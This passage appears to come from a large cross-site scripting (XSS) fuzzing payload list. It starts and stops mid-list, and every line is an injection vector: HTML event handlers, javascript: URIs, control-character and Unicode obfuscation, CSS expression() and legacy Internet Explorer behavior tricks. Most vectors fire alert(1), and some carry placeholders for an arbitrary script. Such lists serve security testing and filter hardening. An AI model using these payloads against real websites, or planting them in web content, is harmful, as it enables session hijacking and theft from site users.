onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +"><img src=x onerror=javascript:alert(1)> +"><img src=x onerror=javascript:alert('1')> +"><img src=x onerror=javascript:alert("1")> +"><img src=x onerror=javascript:alert(`1`)> +"><img src=x onerror=javascript:alert(('1'))> +"><img src=x onerror=javascript:alert(("1"))> +"><img src=x onerror=javascript:alert((`1`))> +"><img src=x onerror=javascript:alert(A)> +"><img src=x onerror=javascript:alert((A))> +"><img src=x onerror=javascript:alert(('A'))> +"><img src=x onerror=javascript:alert('A')> +"><img src=x onerror=javascript:alert(("A"))> +"><img src=x onerror=javascript:alert("A")> +"><img src=x onerror=javascript:alert((`A`))> +"><img src=x onerror=javascript:alert(`A`)> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" 